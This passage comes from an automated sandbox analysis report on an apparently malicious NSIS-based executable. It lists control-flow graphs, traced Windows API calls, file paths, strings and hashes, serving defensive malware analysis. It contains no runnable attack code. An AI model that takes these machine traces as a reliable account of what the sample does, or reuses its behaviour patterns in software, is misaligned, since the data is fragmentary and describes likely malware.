API calls 5996->5997 5998 402a3b 5997->5998 5999 402a72 5998->5999 6000 40288b 5998->6000 6002 402a4d 5998->6002 5999->6000 6001 40640a 17 API calls 5999->6001 6001->6000 6002->6000 6004 40632f wsprintfW 6002->6004 6004->6000 6005 401735 6006 402c41 17 API calls 6005->6006 6007 40173c SearchPathW 6006->6007 6008 4029e6 6007->6008 6009 401757 6007->6009 6009->6008 6011 4063e8 lstrcpynW 6009->6011 6011->6008 6012 4014b8 6013 4014be 6012->6013 6014 401389 2 API calls 6013->6014 6015 4014c6 6014->6015 6016 401db9 GetDC 6017 402c1f 17 API calls 6016->6017 6018 401dcb GetDeviceCaps MulDiv ReleaseDC 6017->6018 6019 402c1f 17 API calls 6018->6019 6020 401dfc 6019->6020 6021 40640a 17 API calls 6020->6021 6022 401e39 CreateFontIndirectW 6021->6022 6023 402592 6022->6023 6024 40283b 6025 402843 6024->6025 6026 402847 FindNextFileW 6025->6026 6027 402859 6025->6027 6026->6027 6029 4029e6 6027->6029 6030 4063e8 lstrcpynW 6027->6030 6030->6029

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 30->34 35 4035db-4035df 30->35 31->30 31->31 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->53 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->38 54 40369d-4036a1 50->54 51->50 52 40364d-403655 51->52 60 403657-40365a 52->60 61 40365c 52->61 53->37 53->57 54->38 63 4036c2-4036d0 call 4063e8 54->63 55->56 56->28 64 4036c0 56->64 73 40394a-403950 57->73 74 40382a-40383a call 405a4e ExitProcess 57->74 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->50 60->61 61->50 69 4036d5 63->69 64->69 76 403810 65->76 80 403782-4037b7 66->80 81 4037ce-4037d8 66->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->57 87 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40399e-4039ac call 4067c2 78->88 82 4039d8 79->82 83 4039dc-4039e0 ExitProcess 79->83 89 4037b9-4037bd 80->89 85 403840-403854 call 4059b9 lstrcatW 81->85 86 4037da-4037e8 call 405dc5 81->86 82->83 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->57 99 4037ea-403800 call 4063e8 * 2 86->99 87->88 102 4039ba-4039c5 ExitWindowsEx 88->102 103 4039ae-4039b8 88->103 90 4037c6-4037ca 89->90 91 4037bf-4037c4 89->91 90->89 95 4037cc 90->95 91->90 91->95 95->81 99->65 100->57 106 40387d-403880 100->106 101->100 102->79 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->79 109 403882-403887 call 40591f 106->109 110 403889 call 40599c 106->110 115 40388e-40389c SetCurrentDirectoryW 109->115 110->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                    • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                    • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                    • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000020,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                      • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                      • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                    • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\9Yn5tjyOgT.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                    • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                    • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Iw\Vehefte190$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\9Yn5tjyOgT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                    • API String ID: 3441113951-3070835881
                                                                                                                    • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                    • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                    • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                    • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 162 4051c7-4051cf 152->162 163 405158-40515e 152->163 153->154 154->151 159 405089-40508c 155->159 160 4050fc-4050ff 155->160 156->152 156->155 199 404f33-404f39 157->199 200 404ff8-40500b GetWindowLongW SetWindowLongW 157->200 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->152 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 198 4050ae-4050bf 168->198 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->152 183 405127-405131 174->183 175->174 184 4051f2-4051f9 176->184 185 4051eb-4051ec ImageList_Destroy 176->185 188 405371-405378 177->188 189 405221-40522d call 4011ef 177->189 180->172 181 405189-40519a SendMessageW 180->181 191 4051a4-4051a6 181->191 192 40519c-4051a2 181->192 194 405142-40514c 183->194 195 405133-405140 183->195 196 405202-40520e 184->196 197 4051fb-4051fc GlobalFree 184->197 185->184 188->172 193 40537a-405381 188->193 209 40523d-405240 189->209 210 40522f-405232 189->210 202 4051a7-4051c0 call 401299 SendMessageW 191->202 192->191 192->202 193->172 203 405383-4053ad ShowWindow GetDlgItem ShowWindow 193->203 194->152 195->152 196->177 197->196 198->160 205 4050c1-4050c3 198->205 206 404f3c-404f43 199->206 204 405011-405015 200->204 202->162 203->172 212 405017-40502a ShowWindow call 404394 204->212 213 40502f-405037 call 404394 204->213 214 4050c5-4050cc 205->214 215 4050d6 205->215 207 404fd9-404fec 206->207 208 404f49-404f71 206->208 207->206 222 404ff2-404ff6 207->222 216 404f73-404fa9 SendMessageW 208->216 217 404fab-404fad 208->217 223 405281-4052a5 call 4011ef 209->223 224 405242-40525b call 4012e2 call 401299 209->224 219 405234 210->219 220 405235-405238 call 404d9a 210->220 212->172 213->140 227 4050d2-4050d4 214->227 228 4050ce-4050d0 214->228 218 4050d9-4050f5 call 40117d 215->218 216->207 229 404fc0-404fd6 SendMessageW 217->229 230 404faf-404fbe SendMessageW 217->230 218->160 219->220 220->209 222->200 222->204 241 405347-40535b InvalidateRect 223->241 242 4052ab 223->242 246 40526b-40527a SendMessageW 224->246 247 40525d-405263 224->247 227->218 228->218 229->207 230->207 241->188 245 40535d-40536c call 404ced call 404cd5 241->245 243 4052ae-4052b9 242->243 248 4052bb-4052ca 243->248 249 40532f-405341 243->249 245->188 246->223 254 405265 247->254 255 405266-405269 247->255 252 4052cc-4052d9 248->252 253 4052dd-4052e0 248->253 249->241 249->243 252->253 257 4052e2-4052e5 253->257 258 4052e7-4052f0 253->258 254->255 255->246 255->247 259 4052f5-40532d SendMessageW * 2 257->259 258->259 260 4052f2 258->260 259->249 260->259
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                    • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                    • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                    • String ID: $M$N
                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                    • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                    • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                    • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                    • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 738E121B: GlobalAlloc.KERNEL32(00000040,?,738E123B,?,738E12DF,00000019,738E11BE,-000000A0), ref: 738E1225
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 738E1C6B
                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 738E1CB3
                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 738E1CBD
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1CD0
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1DB2
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1DB7
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1DBC
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1FA6
                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 738E2140
                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 738E21B5
                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 738E21C6
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 738E2220
                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 738E223A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 245916457-0
                                                                                                                    • Opcode ID: 7cf459f482f7d17abc5eb4e13c0315e06a774f2e22a69665af80c3101db2cee4
                                                                                                                    • Instruction ID: 821b1a73e0b3de235376300c5a2dc2b9571ea08fc4353898e834ee2acecfa975
                                                                                                                    • Opcode Fuzzy Hash: 7cf459f482f7d17abc5eb4e13c0315e06a774f2e22a69665af80c3101db2cee4
                                                                                                                    • Instruction Fuzzy Hash: 4A229A71D8020ADBDB11DFE4C9817EEB7B6FB06305F1485AED2A6E3280D7749A80CB50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 724 405afa-405b20 call 405dc5 727 405b22-405b34 DeleteFileW 724->727 728 405b39-405b40 724->728 729 405cb6-405cba 727->729 730 405b42-405b44 728->730 731 405b53-405b63 call 4063e8 728->731 732 405c64-405c69 730->732 733 405b4a-405b4d 730->733 739 405b72-405b73 call 405d09 731->739 740 405b65-405b70 lstrcatW 731->740 732->729 735 405c6b-405c6e 732->735 733->731 733->732 737 405c70-405c76 735->737 738 405c78-405c80 call 40672b 735->738 737->729 738->729 748 405c82-405c96 call 405cbd call 405ab2 738->748 743 405b78-405b7c 739->743 740->743 744 405b88-405b8e lstrcatW 743->744 745 405b7e-405b86 743->745 747 405b93-405baf lstrlenW FindFirstFileW 744->747 745->744 745->747 749 405bb5-405bbd 747->749 750 405c59-405c5d 747->750 764 405c98-405c9b 748->764 765 405cae-405cb1 call 405450 748->765 752 405bdd-405bf1 call 4063e8 749->752 753 405bbf-405bc7 749->753 750->732 755 405c5f 750->755 766 405bf3-405bfb 752->766 767 405c08-405c13 call 405ab2 752->767 756 405bc9-405bd1 753->756 757 405c3c-405c4c FindNextFileW 753->757 755->732 756->752 760 405bd3-405bdb 756->760 757->749 763 405c52-405c53 FindClose 757->763 760->752 760->757 763->750 764->737 770 405c9d-405cac call 405450 call 4061ae 764->770 765->729 766->757 771 405bfd-405c06 call 405afa 766->771 775 405c34-405c37 call 405450 767->775 776 405c15-405c18 767->776 770->729 771->757 775->757 779 405c1a-405c2a call 405450 call 4061ae 776->779 780 405c2c-405c32 776->780 779->757 780->757
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B23
                                                                                                                    • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B6B
                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B8E
                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B94
                                                                                                                    • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405BA4
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                    • API String ID: 2035342205-3589890583
                                                                                                                    • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                    • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                    • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                    • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                    • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                    • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                    • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406736
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
